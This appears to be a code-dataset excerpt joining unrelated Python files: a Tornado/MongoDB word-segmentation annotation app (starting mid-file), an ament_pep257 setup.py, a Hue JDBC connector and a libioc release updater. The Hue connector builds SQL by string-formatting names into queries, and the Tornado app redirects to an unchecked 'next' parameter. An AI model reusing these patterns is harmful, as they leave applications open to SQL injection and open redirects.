super(Application, self).__init__(handlers, **settings)
client = pymongo.MongoClient("mongodb://localhost")
self.db = client.rawtext
class BaseHandler(tornado.web.RequestHandler):
@property
def db(self):
return self.application.db
def get_current_user(self):
user_id = self.get_secure_cookie("rawtext_user")
if not user_id:
return None
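        # The secure cookie value comes back as bytes; rebuild the username
        # string before looking the author up in MongoDB.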
usernm = "".join([chr(x) for x in user_id])
user = self.application.db.authors.find_one({'name': usernm})
return user
def any_author_exists(self):
one = self.db.authors.find_one()
return bool(one)
class HomeHandler(BaseHandler):
def get(self):
entries =[]
cursor = self.db.entries.find().limit(5)
for entry in cursor:
entries.append(entry)
self.render("home.html", entries=entries)
class EntryHandler(BaseHandler):
def get(self, slug):
entry = self.db.entries.find_one({"slug": slug})
if not entry: raise tornado.web.HTTPError(404)
self.render("entry.html", entry=entry)
class ArchiveHandler(BaseHandler):
def get(self):
cursor = self.db.entries.find().sort('published', -1)
entries = [entry for entry in cursor]
self.render("archive.html", entries=entries)
class FeedHandler(BaseHandler):
def get(self):
entries = []
cursor = self.db.entries.find().sort('published', -1).limit(10)
for entry in cursor:
entries.append(entry)
self.set_header("Content-Type", "application/atom+xml")
self.render("feed.xml", entries=entries)
class ComposeHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
article_id = self.get_argument("id", None)
entry = None
if article_id:
entry = self.db.entries.find_one({"_id": ObjectId(article_id)})
self.render("compose.html", entry=entry)
@tornado.web.authenticated
def post(self):
id = self.get_argument("_id", None)
title = self.get_argument("title")
text = self.get_argument("markdown")
html = markdown.markdown(text)
# if user_name:
if id:
entry = self.db.entries.find_one({"_id": ObjectId(id)})
if not entry: raise tornado.web.HTTPError(404)
slug = entry["slug"]
doc = {
"title": title,
"markdown": text,
"html": html,
"last_modify":datetime.datetime.utcnow()
}
self.db.entries.update_one({"_id": ObjectId(id)}, {"$set": doc})
else:
slug = str(unicodedata.normalize("NFKD", title).encode(
"ascii", "ignore"))
slug = re.sub(r"[^\w]+", " ", str(slug))
slug = "-".join(slug.lower().strip().split())
if not slug: slug = "entry"
while True:
e = self.db.entries.find_one({"slug": slug})
if not e: break
slug += "-2"
doc = {
"author_id": str(self.current_user["_id"]),
"author_name": self.current_user["name"],
"title": title,
"slug": slug,
"markdown": text,
"html": html,
"published": datetime.datetime.utcnow()
}
self.db.entries.insert_one(doc)
self.redirect("/entry/" + slug)
class AuthCreateHandler(BaseHandler):
def get(self):
self.render("create_author.html")
@gen.coroutine
def post(self):
if self.any_author_exists():
raise tornado.web.HTTPError(400, "author already created")
hashed_password = yield executor.submit(
bcrypt.hashpw, tornado.escape.utf8(self.get_argument("password")),
bcrypt.gensalt())
author = {
"email": self.get_argument("email"),
"name": self.get_argument("name"),
"hashed_password": hashed_password
}
try:
result = self.db.authors.insert_one(author)
except Exception as e:
raise tornado.web.HTTPError(404)
self.set_secure_cookie("rawtext_user", author["name"])
self.redirect(self.get_argument("next", "/"))
class AuthLoginHandler(BaseHandler):
def get(self):
# If there are no authors, redirect to the account creation page.
if not self.any_author_exists():
self.redirect("/auth/create")
else:
self.render("login.html", error=None)
@gen.coroutine
def post(self):
author = self.db.authors.find_one({'email': self.get_argument("email")})
if not author:
self.render("login.html", error="email not found")
return
hashed_password = yield executor.submit(
bcrypt.hashpw, tornado.escape.utf8(self.get_argument("password")),
tornado.escape.utf8(author["hashed_password"]))
if hashed_password == author["hashed_password"]:
self.set_secure_cookie("rawtext_user", author["name"])
self.redirect(self.get_argument("next", "/"))
else:
self.render("login.html", error="incorrect password")
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("rawtext_user")
self.redirect(self.get_argument("next", "/"))
class EntryModule(tornado.web.UIModule):
def render(self, entry):
return self.render_string("modules/entry.html", entry=entry)
class TextListHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
page = self.get_argument("page", None)
num = self.get_argument("num", None)
status = self.get_argument("type", None)
statuslst = ['raw', 'cut', 'check']
query = {}
if status:
            # filter by status code ("1" = raw, "2" = cut, "3" = checked);
            # status is stored as an integer in MongoDB
            if status in ('1', '2', '3'):
                query = {'status': int(status)}
        if not num:
            num = 20
        else:
            num = int(num)
if not page:
page = 0
else:
page = int(page)
cursor = self.db.text.find(
query,
{
'_id': 1,
'batch': 1,
'summary': 1,
'info': 1,
'status': 1,
'creator': 1,
'create_time': 1
}
).sort("create_time", -1).skip(page * num).limit(num)
raws = []
status_table = ["已删除", "未处理", "已分词", "已校对"]
for raw in cursor:
raw["_id"] = str(raw["_id"])
raw["info"]["source"] = raw["info"]["source"][:10]
raw["info"]["author"] = raw["info"]["author"][:10]
raw["info"]["url"] = raw["info"]["url"][:10]
raw["status"] = status_table[raw["status"]]
raw["summary"] = raw["summary"][:10] + "..."
#raw["creator"] = self.get_current_user() #str(raw["creator"])
raws.append(raw)
# print("raws: ", raws)
self.render("textlist.html", raws=raws, page=page)
class AboutHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
text = {
'title': "一些说明",
'author': "redsky",
'content': [
"写得很乱,应该用Backbone的,大意了!"
],
'date': '2017/5/22 12:18'
}
self.render("about.html", texts=text)
class RawTextHandler(BaseHandler):
"""
add/modify raw text; cut/check not here.
text status:
"""
@tornado.web.authenticated
def get(self, id):
text = []
# id = self.get_argument("id", None)
if id:
text = self.db.text.find_one({"_id": ObjectId(id)})
text["_id"] = str(text["_id"])
self.render("text.html", text=text, msg="")
@tornado.web.authenticated
    def post(self, id=None):
id = self.get_argument("_id", None)
whitelst = [
'batch',
'raw'
]
infolst = [
'source',
'author',
'field',
'time'
]
error_flag = False
doc = {'info': {}}
for item in whitelst:
doc[item] = self.get_argument(item, None)
if not doc[item]:
error_flag = True
break
for item in infolst:
doc["info"][item] = self.get_argument(item)
if not doc["info"][item]:
error_flag = True
break
if error_flag:
self.render("text.html", error="请填写所有项!")
return
doc['info']['field'] = doc['info']['field'].split(',')
source_url = self.get_argument('url', None)
if source_url:
doc["info"]['url'] = source_url
doc['summary'] = doc['raw'][:40] + "..."
creator_info = self.get_current_user()
creator = {
'name': creator_info['name'],
'email': creator_info['email']
}
doc['creator'] = creator
print("id: ", id)
if id:
doc['modify_time'] = datetime.datetime.utcnow()
self.db.text.update_one({"_id": ObjectId(id)}, {"$set": doc})
else:
doc['create_time'] = datetime.datetime.utcnow()
doc['status'] = 1
self.db.text.insert_one(doc)
self.redirect("/texts")
class WordSegHandler(BaseHandler):
"""
add/modify raw text; cut/check not here.
text status:
"""
@tornado.web.authenticated
def get(self, id):
text = []
# id = self.get_argument("id", None)
if id:
text = self.db.text.find_one(
{"_id": ObjectId(id)},
{
"_id": 1,
"raw": 1,
"proofreaded": 1,
"cut": 1
}
)
text["_id"] = str(text["_id"])
else:
self.redirect("/texts/")
# self.render("wslist.html", result=text["proofreaded"], id=text["_id"])
return
if "proofreaded" in text: #text["proofreaded"]:
data = text["proofreaded"]
else:
data = text["cut"]
self.render(
"wordseg.html",
result=data,
raw=text["raw"],
id=id,
error=""
)
@tornado.web.authenticated
def post(self, id):
# id = self.get_argument("_id", None)
data = self.get_argument("data", None)
proofreaded = self.get_argument("proofreaded_ok", None)
# json to dict
if not data:
return
try:
wordlst = json.loads(data)
except Exception as e:
return
# find document from MongoDB by id, verify wether data string equals to raw or cut
text = self.db.text.find_one(
{
"_id": ObjectId(id)
},
{
"_id": 1,
"raw": 1,
"cut": 1
}
)
if not text:
self.redirect("/texts/")
return
if "cut" not in text:
self.redirect("/texts/")
return
# compare data
input_str = "".join(wordlst)
orgin_str = "".join(text["cut"])
if input_str != orgin_str:
self.render(
"wordseg.html",
result=text["cut"],
id=id,
raw="",
error="与原始数据不吻合!"
)
return
# update document in MongoDB by id
values = {
"$set":
{
"proofreaded": wordlst,
}
}
if proofreaded:
values["$set"]["status"] = 3
rvalue = self.db.text.update_one(
{
"_id": ObjectId(id)
},
values
)
if rvalue:
self.render(
"wordseg.html",
result=wordlst,
id=id,
raw=text["raw"],
error=""
)
else:
self.render(
"wordseg.html",
result=[],
id=id,
raw="",
error="更新数据失败!"
)
class ExportHandler(BaseHandler):
"""
select data and export
"""
@tornado.web.authenticated
def get(self):
self.render("export.html")
@tornado.web.authenticated
def post(self):
batch_list = self.get_argument("batch")
if not batch_list:
self.render("export.html", error=1)
return
query = {"status": 3}
if batch_list != "ALL":
try:
batch = [x.strip() for x in batch_list.split(",")]
query["batch"] = {"$in": batch}
except Exception as e:
self.render("export.html", error="参数有误")
return
filter = {"_id":0, "proofreaded": 1}
cursor = self.db.text.find( query, filter )
lst = []
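        # Emit per-character BMES-style tags for each proofread word:
        # single-character words are tagged "/s", longer words get "/b"
        # (begin), "/m" (middle) and "/e" (end); a newline token tagged
        # "/s" separates consecutive documents.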
for ele in cursor:
for word in ele["proofreaded"]:
length = len(word)
if length == 1:
lst.append(word[0] + '/s')
else:
lst.append(word[0] + '/b')
for c in word[1:-1]:
lst.append(c + '/m')
lst.append(word[-1] + '/e')
lst.append('\n/s')
train = ' '.join(lst)
filenm = 'train_{0}'.format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
self.set_header('Content-Type', 'application/octet-stream')
self.set_header('Content-Disposition', 'attachment; filename=' + filenm)
buf_size = 4096
count = 0
while True:
data = train[count:count+buf_size]
self.write(data)
if count + buf_size > len(train):
break
count += buf_size
self.finish()
def main():
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
| 30.684116 | 90 | 0.526855 |
7739b83899057b7473e77b75e1e35dd2a2e24bb8 | 1,476 | py | Python | ament_pep257/setup.py | ExcessBullseye/ament_lint | 100683ca73de2ccf377937e64955d5b79c43721e | [
"Apache-2.0"
] | null | null | null | ament_pep257/setup.py | ExcessBullseye/ament_lint | 100683ca73de2ccf377937e64955d5b79c43721e | [
"Apache-2.0"
] | null | null | null | ament_pep257/setup.py | ExcessBullseye/ament_lint | 100683ca73de2ccf377937e64955d5b79c43721e | [
"Apache-2.0"
] | null | null | null | from setuptools import find_packages
from setuptools import setup
package_name = 'ament_pep257'
setup(
name=package_name,
version='0.10.6',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['setuptools'],
package_data={'': [
'configuration/ament_pep257.ini',
]},
zip_safe=True,
author='Dirk Thomas',
author_email='dthomas@osrfoundation.org',
maintainer='Audrow Nash',
maintainer_email='audrow@openrobotics.org',
url='https://github.com/ament/ament_lint',
download_url='https://github.com/ament/ament_lint/releases',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description='Check Python code style using pep257.',
long_description="""\
The ability to check code against the docstring conventions in PEP 257
and generate xUnit test result files.""",
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'ament_pep257 = ament_pep257.main:main',
],
'pytest11': [
'ament_pep257 = ament_pep257.pytest_marker',
],
},
)
| 30.75 | 70 | 0.639566 |
5244fb5b22b7e7dd44890749467daa379c964477 | 8,142 | py | Python | desktop/libs/notebook/src/notebook/connectors/jdbc.py | e11it/hue-1 | 436704c40b5fa6ffd30bd972bf50ffeec738d091 | [
"Apache-2.0"
] | null | null | null | desktop/libs/notebook/src/notebook/connectors/jdbc.py | e11it/hue-1 | 436704c40b5fa6ffd30bd972bf50ffeec738d091 | [
"Apache-2.0"
] | null | null | null | desktop/libs/notebook/src/notebook/connectors/jdbc.py | e11it/hue-1 | 436704c40b5fa6ffd30bd972bf50ffeec738d091 | [
"Apache-2.0"
] | 1 | 2020-04-02T04:50:26.000Z | 2020-04-02T04:50:26.000Z | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import object
import logging
import sys
from django.utils.translation import ugettext as _
from beeswax import data_export
from desktop.lib.i18n import force_unicode, smart_str
from librdbms.jdbc import Jdbc, query_and_fetch
from notebook.connectors.base import Api, QueryError, AuthenticationRequired, _get_snippet_name
LOG = logging.getLogger(__name__)
# Cache one JDBC connection by user for not saving user credentials
API_CACHE = {}
def query_error_handler(func):
def decorator(*args, **kwargs):
try:
return func(*args, **kwargs)
except AuthenticationRequired as e:
raise e
except Exception as e:
message = force_unicode(smart_str(e))
if 'error occurred while trying to connect to the Java server' in message:
raise QueryError, _('%s: is the DB Proxy server running?') % message, sys.exc_info()[2]
elif 'Access denied' in message:
raise AuthenticationRequired, '', sys.exc_info()[2]
else:
raise QueryError, message, sys.exc_info()[2]
return decorator
class JdbcApi(Api):
def __init__(self, user, interpreter=None):
global API_CACHE
Api.__init__(self, user, interpreter=interpreter)
self.db = None
self.options = interpreter['options']
if self.cache_key in API_CACHE:
self.db = API_CACHE[self.cache_key]
elif 'password' in self.options:
username = self.options.get('user') or user.username
impersonation_property = self.options.get('impersonation_property')
self.db = API_CACHE[self.cache_key] = Jdbc(self.options['driver'], self.options['url'], username, self.options['password'], impersonation_property=impersonation_property, impersonation_user=user.username)
def create_session(self, lang=None, properties=None):
global API_CACHE
props = super(JdbcApi, self).create_session(lang, properties)
properties = dict([(p['name'], p['value']) for p in properties]) if properties is not None else {}
props['properties'] = {} # We don't store passwords
if self.db is None or not self.db.test_connection(throw_exception='password' not in properties):
if 'password' in properties:
user = properties.get('user') or self.options.get('user')
props['properties'] = {'user': user}
self.db = API_CACHE[self.cache_key] = Jdbc(self.options['driver'], self.options['url'], user, properties.pop('password'))
self.db.test_connection(throw_exception=True)
if self.db is None:
raise AuthenticationRequired()
return props
@query_error_handler
def execute(self, notebook, snippet):
if self.db is None:
raise AuthenticationRequired()
data, description = query_and_fetch(self.db, snippet['statement'], 1000)
has_result_set = data is not None
return {
'sync': True,
'has_result_set': has_result_set,
'result': {
'has_more': False,
'data': data if has_result_set else [],
'meta': [{
'name': col[0],
'type': col[1],
'comment': ''
} for col in description] if has_result_set else [],
'type': 'table'
}
}
@query_error_handler
def check_status(self, notebook, snippet):
return {'status': 'available'}
def _fetch_result(self, cursor):
return {}
@query_error_handler
def fetch_result_metadata(self):
pass
@query_error_handler
def cancel(self, notebook, snippet):
return {'status': 0}
@query_error_handler
def close_statement(self, notebook, snippet):
return {'status': -1}
@query_error_handler
def autocomplete(self, snippet, database=None, table=None, column=None, nested=None):
if self.db is None:
raise AuthenticationRequired()
assist = self._createAssist(self.db)
response = {'status': -1}
if database is None:
response['databases'] = assist.get_databases()
elif table is None:
tables = assist.get_tables_full(database)
response['tables'] = [table['name'] for table in tables]
response['tables_meta'] = tables
else:
columns = assist.get_columns_full(database, table)
response['columns'] = [col['name'] for col in columns]
response['extended_columns'] = columns
response['status'] = 0
return response
@query_error_handler
def get_sample_data(self, snippet, database=None, table=None, column=None, is_async=False, operation=None):
if self.db is None:
raise AuthenticationRequired()
assist = self._createAssist(self.db)
response = {'status': -1, 'result': {}}
sample_data, description = assist.get_sample_data(database, table, column)
if sample_data or description:
response['status'] = 0
response['headers'] = [col[0] for col in description] if description else []
response['full_headers'] = [{
'name': col[0],
'type': col[1],
'comment': ''
} for col in description]
response['rows'] = sample_data if sample_data else []
else:
response['message'] = _('Failed to get sample data.')
return response
@property
def cache_key(self):
return '%s-%s' % (self.interpreter['name'], self.user.username)
def _createAssist(self, db):
return Assist(db)
class Assist(object):
def __init__(self, db):
self.db = db
def get_databases(self):
dbs, description = query_and_fetch(self.db, 'SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA')
return [db[0] and db[0].strip() for db in dbs]
def get_tables(self, database, table_names=[]):
tables = self.get_tables_full(database, table_names)
return [table['name'] for table in tables]
def get_tables_full(self, database, table_names=[]):
tables, description = query_and_fetch(self.db, "SELECT TABLE_NAME, TABLE_COMMENT FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'" % database)
return [{"comment": table[1] and table[1].strip(), "type": "Table", "name": table[0] and table[0].strip()} for table in tables]
def get_columns(self, database, table):
columns = self.get_columns_full(database, table)
return [col['name'] for col in columns]
def get_columns_full(self, database, table):
columns, description = query_and_fetch(self.db, "SELECT COLUMN_NAME, DATA_TYPE, COLUMN_COMMENT FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s' AND TABLE_NAME='%s'" % (database, table))
return [{"comment": col[2] and col[2].strip(), "type": col[1], "name": col[0] and col[0].strip()} for col in columns]
def get_sample_data(self, database, table, column=None):
column = column or '*'
#data, description = query_and_fetch(self.db, 'SELECT %s FROM %s.%s limit 100' % (column, database, table))
#response['rows'] = data
#response['columns'] = []
return query_and_fetch(self.db, 'SELECT %s FROM %s.%s limit 100' % (column, database, table))
class FixedResultSet(object):
def __init__(self, data, metadata):
self.data = data
self.metadata = metadata
self.has_more = False
def cols(self):
return [str(col[0]) for col in self.metadata]
def rows(self):
return self.data if self.data is not None else []
class FixedResult(object):
def __init__(self, data, metadata):
self.data = data
self.metadata = metadata
def fetch(self, handle=None, start_over=None, rows=None):
return FixedResultSet(self.data, self.metadata)
| 34.066946 | 210 | 0.689388 |
7c250191bf3ac9bd184517465ed5ec381045a5cd | 1,264 | py | Python | erp/migrations/0035_auto_20200206_1109.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | 8 | 2020-07-23T08:17:28.000Z | 2022-03-09T22:31:36.000Z | erp/migrations/0035_auto_20200206_1109.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | 37 | 2020-07-01T08:47:33.000Z | 2022-02-03T19:50:58.000Z | erp/migrations/0035_auto_20200206_1109.py | Foohx/acceslibre | 55135e096f2ec4e413ff991f01c17f5e0d5925c0 | [
"MIT"
] | 4 | 2021-04-08T10:57:18.000Z | 2022-01-31T13:16:31.000Z | # Generated by Django 3.0.3 on 2020-02-06 10:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('erp', '0034_accessibilite_entree_plain_pied'),
]
operations = [
migrations.AlterModelOptions(
name='activite',
options={'ordering': ('nom',), 'verbose_name': 'Activité', 'verbose_name_plural': 'Activités'},
),
migrations.AlterModelOptions(
name='equipementmalentendant',
options={'ordering': ('nom',), 'verbose_name': 'Équipement sourd/malentendant', 'verbose_name_plural': 'Équipements sourd/malentendant'},
),
migrations.AlterModelOptions(
name='label',
options={'ordering': ('nom',), 'verbose_name': "Label d'accessibilité", 'verbose_name_plural': "Labels d'accessibilité"},
),
migrations.AlterField(
model_name='erp',
name='activite',
field=models.ForeignKey(blank=True, help_text="Domaine d'activité de l'ERP. Attention, la recherche se fait sur les lettres accentuées", null=True, on_delete=django.db.models.deletion.SET_NULL, to='erp.Activite', verbose_name='Activité'),
),
]
| 39.5 | 250 | 0.641614 |
3da76bdaea90f8e15cd36e524ffe1eb91453bac7 | 969 | py | Python | main.py | Jeffrey-Gadenne/ENG103_GUI_IOT_DATABASE_HEART | f0b8f596fc42c5f08a0569d637ef6dfa33ea0355 | [
"MIT"
] | null | null | null | main.py | Jeffrey-Gadenne/ENG103_GUI_IOT_DATABASE_HEART | f0b8f596fc42c5f08a0569d637ef6dfa33ea0355 | [
"MIT"
] | null | null | null | main.py | Jeffrey-Gadenne/ENG103_GUI_IOT_DATABASE_HEART | f0b8f596fc42c5f08a0569d637ef6dfa33ea0355 | [
"MIT"
] | null | null | null | from heartrate_monitor import HeartRateMonitor
import time
import argparse
import Adafruit_DHT
import argparse
import sys
import tempread
sys.stdout = open ("heart.txt", "w")
dht_sensor = Adafruit_DHT.DHT11
pin = 5
humidity, temperature = Adafruit_DHT.read_retry(dht_sensor, pin)
parser = argparse.ArgumentParser(description="Read and print data from MAX30102")
parser.add_argument("-r", "--raw", action="store_true",
help="print raw data instead of calculation result")
parser.add_argument("-t", "--time", type=int, default=30,
help="duration in seconds to read from sensor, default 30")
args = parser.parse_args()
print('sensor starting...')
hrm = HeartRateMonitor(print_raw=args.raw, print_result=(not args.raw))
hrm.start_sensor()
try:
time.sleep(args.time)
except KeyboardInterrupt:
print('keyboard interrupt detected, exiting...')
hrm.stop_sensor()
print('sensor stoped!')
import gui
sys.stdout.close()
| 26.189189 | 81 | 0.728586 |
0e81231f074d3a9d0aae862d0496205cd19d5aaa | 1,122 | py | Python | build.py | gcuendet/conan-libjpeg-turbo | f974c40e839290d77318002f8be9cc164f6a33fb | [
"MIT"
] | null | null | null | build.py | gcuendet/conan-libjpeg-turbo | f974c40e839290d77318002f8be9cc164f6a33fb | [
"MIT"
] | null | null | null | build.py | gcuendet/conan-libjpeg-turbo | f974c40e839290d77318002f8be9cc164f6a33fb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bincrafters import build_template_default
import platform
import copy
if __name__ == "__main__":
builder = build_template_default.get_builder()
items = []
for item in builder.items:
# skip mingw cross-builds
if not (platform.system() == "Windows" and item.settings["compiler"] == "gcc" and
item.settings["arch"] == "x86"):
new_build_requires = copy.copy(item.build_requires)
# add msys2 and mingw as a build requirement for mingw builds
if platform.system() == "Windows" and item.settings["compiler"] == "gcc":
new_build_requires["*"] = new_build_requires.get("*", []) + \
["mingw_installer/1.0@conan/stable",
"msys2_installer/latest@bincrafters/stable"]
items.append([item.settings, item.options, item.env_vars,
new_build_requires, item.reference])
else:
# or just add build
items.append(item)
builder.items = items
builder.run()
| 36.193548 | 89 | 0.582888 |
a3d7a64a8366fb641b44e64d89da8b8670e6be37 | 24,682 | py | Python | libioc/ResourceUpdater.py | himrock922/libioc | 83111de2320c96946234eec852c00de72482ea0f | [
"BSD-2-Clause"
] | null | null | null | libioc/ResourceUpdater.py | himrock922/libioc | 83111de2320c96946234eec852c00de72482ea0f | [
"BSD-2-Clause"
] | null | null | null | libioc/ResourceUpdater.py | himrock922/libioc | 83111de2320c96946234eec852c00de72482ea0f | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2017-2019, Stefan Grönke
# Copyright (c) 2014-2018, iocage
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Updater for Releases and other LaunchableResources like Jails."""
import typing
import os
import os.path
import re
import shutil
import urllib
import urllib.error
import libioc.events
import libioc.errors
import libioc.Jail
# MyPy
import libzfs
class Updater:
"""Updater for Releases and other LaunchableResources like Jails."""
update_name: str
update_script_name: str
update_conf_name: str
_temporary_jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
resource: 'libioc.LaunchableResource.LaunchableResource',
host: 'libioc.Host.HostGenerator'
) -> None:
self.resource = resource
self.host = host
@property
def logger(self) -> 'libioc.Logger.Logger':
"""Shortcut to the resources logger."""
return self.resource.logger
@property
def local_release_updates_dir(self) -> str:
"""Return the absolute path to updater directory (os-dependend)."""
return f"/var/db/{self.update_name}"
@property
def host_updates_dataset_name(self) -> str:
"""Return the name of the updates dataset."""
ReleaseGenerator = libioc.Release.ReleaseGenerator
if isinstance(self.resource, ReleaseGenerator):
release_dataset = self.resource.dataset
else:
release_dataset = self.resource.release.dataset
return f"{release_dataset.name}/updates"
@property
def host_updates_dataset(self) -> libzfs.ZFSDataset:
"""Return the updates dataset."""
dataset_name = self.host_updates_dataset_name
zfs = self.resource.zfs
_dataset = zfs.get_or_create_dataset(dataset_name)
dataset = _dataset # type: libzfs.ZFSDataset
return dataset
@property
def host_updates_dir(self) -> str:
"""Return the mountpoint of the updates dataset."""
return str(self.host_updates_dataset.mountpoint)
@property
def local_temp_dir(self) -> str:
"""Return the update temp directory relative to the jail root."""
return f"{self.local_release_updates_dir}/temp"
@property
def release(self) -> 'libioc.Release.ReleaseGenerator':
"""Return the associated release."""
if isinstance(self.resource, libioc.Release.ReleaseGenerator):
return self.resource
return self.resource.release
def _wrap_command(self, command: str, kind: str) -> str:
return command
@property
def patch_version(self) -> int:
"""
Return the latest known patch version.
When no patch version is known the release was not updated yet.
"""
return 0
@property
def temporary_jail(self) -> 'libioc.Jail.JailGenerator':
"""Temporary jail instance that will be created to run the update."""
if hasattr(self, "_temporary_jail") is False:
temporary_name = self.resource.name.replace(".", "-") + "_u"
temporary_jail = libioc.Jail.JailGenerator(
{
"name": temporary_name,
"basejail": False,
"allow_mount_nullfs": "1",
"release": self.release.name,
"exec_start": None,
"securelevel": "0",
"allow_chflags": True,
"vnet": False,
"ip4_addr": None,
"ip6_addr": None,
"defaultrouter": None,
"mount_devfs": True,
"mount_fdescfs": False
},
new=True,
logger=self.resource.logger,
zfs=self.resource.zfs,
host=self.resource.host,
dataset=self.resource.dataset
)
temporary_jail.config.file = "config_update.json"
temporary_jail.config.ignore_source_config = True
root_path = temporary_jail.root_path
destination_dir = f"{root_path}{self.local_release_updates_dir}"
temporary_jail.fstab.file = "fstab_update"
temporary_jail.fstab.new_line(
source=self.host_updates_dir,
destination=destination_dir,
options="rw"
)
if os.path.isdir(destination_dir) is False:
os.makedirs(destination_dir, 0o755)
temporary_jail.fstab.save()
self._temporary_jail = temporary_jail
return self._temporary_jail
@property
def _fetch_command(self) -> typing.List[str]:
raise NotImplementedError("To be implemented by inheriting classes")
@property
def _update_command(self) -> typing.List[str]:
raise NotImplementedError("To be implemented by inheriting classes")
def _get_release_trunk_file_url(
self,
release: 'libioc.Release.ReleaseGenerator',
filename: str
) -> str:
raise NotImplementedError("To be implemented by inheriting classes")
def _create_updates_dir(self) -> None:
self._create_dir(self.host_updates_dir)
def _create_download_dir(self) -> None:
self._create_dir(f"{self.host_updates_dir}/temp")
def _create_jail_update_dir(self) -> None:
root_path = self.release.root_path
jail_update_dir = f"{root_path}{self.local_release_updates_dir}"
self._clean_create_dir(jail_update_dir)
shutil.chown(jail_update_dir, "root", "wheel")
os.chmod(jail_update_dir, 0o755) # nosec: accessible directory
def _create_dir(self, directory: str) -> None:
if os.path.isdir(directory):
return
os.makedirs(directory)
def _clean_create_dir(self, directory: str) -> None:
if os.path.ismount(directory) is True:
libioc.helpers.umount(directory, force=True, logger=self.logger)
if os.path.isdir(directory) is True:
self.logger.verbose(f"Deleting existing directory {directory}")
shutil.rmtree(directory)
self._create_dir(directory)
@property
def local_release_updater_config(self) -> str:
"""Return the local path to the release updater config."""
return f"{self.local_release_updates_dir}/{self.update_conf_name}"
def _download_updater_asset(
self,
local: str,
remote: str,
mode: int
) -> None:
url = self._get_release_trunk_file_url(
release=self.release,
filename=remote
)
if os.path.isfile(local):
os.remove(local)
_request = urllib.request # type: ignore
try:
self.logger.verbose(f"Downloading update assets from {url}")
_request.urlretrieve(url, local) # nosec: url validated
except urllib.error.HTTPError as http_error:
raise libioc.errors.DownloadFailed(
url="EOL Warnings",
code=http_error.code,
logger=self.logger
)
os.chmod(local, mode)
self.logger.debug(
f"Update-asset {remote} for release '{self.release.name}'"
f" saved to {local}"
)
def _modify_updater_config(self, path: str) -> None:
pass
def _pull_updater(self) -> None:
self._create_updates_dir()
self._download_updater_asset(
mode=0o744,
remote=f"usr.sbin/{self.update_name}/{self.update_script_name}",
local=f"{self.host_updates_dir}/{self.update_script_name}"
)
if self.release.version_number >= 12:
conf_path = f"usr.sbin/{self.update_name}/{self.update_conf_name}"
else:
conf_path = f"etc/{self.update_conf_name}"
self._download_updater_asset(
mode=0o644,
remote=conf_path,
local=f"{self.host_updates_dir}/{self.update_conf_name}"
)
self._modify_updater_config(
path=f"{self.host_updates_dir}/{self.update_conf_name}"
)
def fetch(
self,
event_scope: typing.Optional['libioc.events.Scope']=None
) -> typing.Generator['libioc.events.IocEvent', None, None]:
"""Fetch the update of a release."""
ReleaseGenerator = libioc.Release.ReleaseGenerator
if isinstance(self.resource, ReleaseGenerator) is False:
raise libioc.errors.NonReleaseUpdateFetch(
resource=self.resource,
logger=self.logger
)
self.resource._require_release_supported()
events = libioc.events
releaseUpdatePullEvent = events.ReleaseUpdatePull(
self.release,
scope=event_scope
)
releaseUpdateDownloadEvent = events.ReleaseUpdateDownload(
self.release,
scope=releaseUpdatePullEvent.scope
)
yield releaseUpdatePullEvent.begin()
try:
self._pull_updater()
